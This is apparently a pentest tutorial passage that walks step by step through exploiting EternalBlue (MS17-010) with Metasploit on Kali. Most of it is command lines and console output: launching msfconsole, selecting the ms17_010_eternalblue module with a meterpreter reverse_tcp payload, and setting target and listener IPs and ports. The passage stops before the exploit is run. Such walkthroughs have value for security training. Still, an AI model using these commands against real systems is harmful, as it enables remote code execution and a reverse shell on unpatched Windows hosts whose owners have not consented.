After Recon Phase, we have all the information we nned on our victim to start exploiting the target.
First thing we will activate Metasploit Database using this command:
┌──(kali㉿kali)-[~]
└─$ systemctl start postgresql
To check if the service has start we will use the command:
┌──(kali㉿kali)-[~]
└─$ systemctl status postgresql
After successfully starting the Metasploit Database, lets start Metasploit itself:
┌──(kali㉿kali)-[~]
└─$ msfconsole
▼▼▼▼▼▼▼▼
┌──(kali㉿kali)-[~]
└─$ msfconsole
Starting the Metasploit Framework console.../
┌──(kali㉿kali)-[~]
└─$ msfconsole 1 ⨯
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 >
Once we opened Metasploit successfully, we can search for our Eternalblue Exploit using the search command:
msf6 > search eternal blue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
We will choose the 1st option which is number 0 (beacuase numerclly we will start froom 0 in Computers).
After chossing the right exploit for our victim to use on, we will add our payload like so:
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
For this victim i will use the default Payload for this Exploit.
After choosing the Exploit and the Payload, we can configure and customize it for our specific needs:
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
------------ ----------------------- ----------- ----------------------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
--------- --------------- -------- --------------------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Next, we will set our victim ip by using the command "set RHOST <IP>":
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.2.104
rhost => 192.168.2.104
After defining our Victim's IP, we will set the LHOST to our local machine:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.2.149
LHOST => 192.168.2.149
Now we will specify the LPORT (Local Port), i will use port 2323 but it doesnt really matter which port unless its a used port (SSH, FTP etc'):
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 2323
LPORT => 2323
